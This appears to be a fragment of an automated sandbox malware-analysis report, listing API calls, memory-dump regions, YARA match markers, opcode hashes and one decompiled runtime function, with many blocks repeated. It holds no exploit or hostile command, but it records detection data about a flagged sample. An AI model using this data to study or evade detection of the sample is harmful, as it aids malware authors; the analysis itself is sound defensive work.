                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 001673B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 001673B8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00153B93), ref: 0016892D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00153B93), ref: 0016892D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID: .z`
                                              • API String ID: 3298025750-1441809116
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001572EA
                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0015730B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00159BC2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001689C4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0015CD00,?,?), ref: 0016747C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0015CD00,?,?), ref: 0016747C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00163546,?,00163CBF,00163CBF,?,00163546,?,?,?,?,?,00000000,00000000,?), ref: 001688ED
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0015CFD2,0015CFD2,?,00000000,?,?), ref: 00168A90
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,00157C93,?), ref: 0015D46B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                              • Instruction ID: f2d76e958721b087750e1e334c736cd98798a45fcd0c63739ed42d771a6b8384
                                              • Opcode Fuzzy Hash: ea8ae35123d4d4cdb12d068ef0ac2089fa81a1dd3e9039dd27c7d13a4ca72de2
                                              • Instruction Fuzzy Hash: 3AE08C316402046AE720EAB89C02FAA27959B55610F094064F88AE73C3EA21E505C621
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • SetErrorMode.KERNELBASE(00008003,?,?,00157C93,?), ref: 0015D46B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                              • Instruction ID: f70e833eb6b3e07160ff808d0fddf7bca46bb14bab0e11ea3f95298c0ddd73de
                                              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                              • Instruction Fuzzy Hash: 3AD0A7717503087BE610FAA89C03F2632CC5B55B00F494064F949DB3C3DA60F5008171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
                                              • Instruction ID: f348a3b8e337c0aa3fd3521df3a537db9dca7cba57e5b53e0b4bb39d6b362390
                                              • Opcode Fuzzy Hash: 6979fcd7bf26ebe3f22053ed97c200beb11eb11225e43d2831bae59df206c66e
                                              • Instruction Fuzzy Hash: D0B09BF19424C5C9FB11E7604608F17790077E4745F56C175D2024655A4778D095F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00163546,?,00163CBF,00163CBF,?,00163546,?,?,?,?,?,00000000,00000000,?), ref: 001688ED
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Offset: 00150000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                              • Instruction ID: 5f1f30f6e766c1b20299d2eafaa3380faee30b86303d34123a54768dba1595c6
                                              • Opcode Fuzzy Hash: 9b29b8d8f6333de4d83fe617719c6518b8236949c0701bbc89efbad10dc8480f
                                              • Instruction Fuzzy Hash: 9DA022B3A20088000020B3F23C0C3AAE20C80C33BB0200EEFC00C320838883C028322E
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 53%
                                              			E047CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];
                                              				_t15 = _t12;
                                              				_t7 = E0477CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E047C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;
                                              				if(_t9 == 0xffffffff) {
                                              					_t10 = 0;
                                              				} else {
                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                              				return E047C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                              			}


                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047CFDFA
                                              Strings
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047CFE2B
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047CFE01
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp, Offset: 04710000, based on PE: true
                                              • Associated: 0000000A.00000002.560109254.000000000482B000.00000040.00000001.sdmp
                                              • Associated: 0000000A.00000002.560120050.000000000482F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
                                              • Instruction ID: 46021486248fe692521ec4119820fb3e66fe73dd92f8b430ebebee68d28c9f08
                                              • Opcode Fuzzy Hash: 54a316687e86ecc7edbf36e4699af5e4c810fb89568d37206a45fc630c8c40e4
                                              • Instruction Fuzzy Hash: 2AF0F672240611BFEA201A55DC0AF23BB5AEB44730F24435CF628562E1EA62F86096F4
                                              Uniqueness

                                              Uniqueness Score: -1.00%